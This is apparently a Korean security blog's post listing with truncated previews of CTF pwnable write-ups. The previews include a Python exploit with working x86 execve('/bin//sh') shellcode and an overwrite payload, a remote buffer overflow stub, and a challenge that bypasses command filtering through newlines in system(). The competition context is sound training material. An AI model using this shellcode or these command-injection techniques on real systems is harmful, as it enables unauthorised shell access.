Category : Pwnables Summary : arbitrary memory overwrite, vtable Exploit#!/usr/bin/python from socket import * shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" payload = ""payload += "-4\n"payload += "\xe4\x91\x04\x08"payload += "\xe8\x91\x04\x08"payload += "\x90"*0x3..
View All
Category : Pwnables Summary : simple stack-based remote buffer overflow Exploit#!/usr/bin/python from socket import *from struct import pack p = lambda x : pack("
이번 2013년 Codegate 2013 CTF 예선전에 출제됬던 pwnable분야 문제들의 Exploit 및 Solution입니다. Vuln100 : Not yetVuln200 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-200Vuln300 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-300Vuln400 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-400Vuln500 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-500
고려대학교 워룸에서 진행된 BOB 1기의 모의 사이버전에 출제했던 문제입니다. 모의 사이버전 중 점령전 문제로 설정되어 진행되었는데, 대체로 점령전 참여율이 저조했습니다 ㅋㅋㅋ 제일 세팅기간 길었던 부분인데 ㅜㅜ 모의 사이버전 기간이 짧은걸 고려해 대체로 크기가 작게 출제해서 컨셉을 못살린것 같아 살짝 아쉽긴 하네요ㅋㅋ 암튼 재밌으셨길!------------------------------------------------------------------------------------------------------------------------------------------- Category : Pwnable Summary : 1byte overflow, Bypass stack canary with..
Write-up listd (예선) : http://pwn3r.tistory.com/entry/POWER-OF-XX-2012-%EC%98%88%EC%84%A0-listdleakme (본선) : http://pwn3r.tistory.com/entry/POWER-OF-XX-2012-%EB%B3%B8%EC%84%A0-leakmeJustForChicken (본선) : http://pwn3r.tistory.com/entry/Power-Of-XX-2012-%EB%B3%B8%EC%84%A0-JustForChicken-Writeup
POC 컨퍼런스의 이벤트로 진행된 Power Of XX라는 여성대상 해킹대회 예선에 출제했던 문제입니다.system함수에 개행문자를 이용하여 여러명령을 실행할 수 있다는 점을 이용해 필터링을 우회하고 쉘을 획득해야합니다.이 문제 역시 난이도를 중-하로 잡고 냈기 때문에 매우 간단합니다 :)------------------------------------------------------------------------------------------------------------------------------------------- Category : Pwnablenc 59.9.131.148 7979 데몬의 취약점을 이용해 쉘을 획득하고 /home/listd/flag.txt를 읽으세요. Summary ..
POC 컨퍼런스의 이벤트로 진행된 Power Of XX라는 여성대상 해킹대회 본선에 출제했던 문제입니다.문제 소스는 BOB 교육이 진행되는 동안 beist님이 만들어 과제로 출제하셨던 문제를 재구성하여 만든 문제입니다ㅋㅋ출제를 허가해주신 beist님께 감사드립니다 XD난이도는 중-하 정도로 잡고 냈는데 의외로 한 팀도 못 푸셔서 좀 아쉽지만 .. 재밌는 대회되셨길 !ㅋㅋ------------------------------------------------------------------------------------------------------------------------------------------- Category : System Hacking, Trivialssh 192.168.0.17..
지난 9월 22일에 예선전을 치뤘던 청소년 해킹방어대회인 중고생 정보보호 올림피아드 본선이 오늘(10월 19일) 진행되었습니다 ㅋㅋ 올해에도 역시 여의도의 국회의원회관에서 본선대회를 진행 하긴 했지만, 이번에는 작년과 다르게 새로 지어진 제 2 국회의원 회관에서 진행했습니다. 겁나 멀어서 아침에 일찍가야한단 점이 걱정이었는데(잠이 많아서 ㅋㅋ), 아버지가 차 태워주셔서 .. 너무 일찍 도착해버렸습니다 ㅋㅋㅋ 원래 9시까지 오라고 공지가 되있었는데, 너무 빨리 도착하는 바람에 8시부터 가서 기다렸습니다. 갔더니 정원이(setuid0)가 더 먼저와서 기다리고 있더군요. 얘기하면서 기다리다보니 다른 참가자들이 오기 시작했습니다ㅋㅋ 그렇게 한 .. 8시 45분정도까지 대기할 수 있는 의자에 앉아있다가 운영진분들..
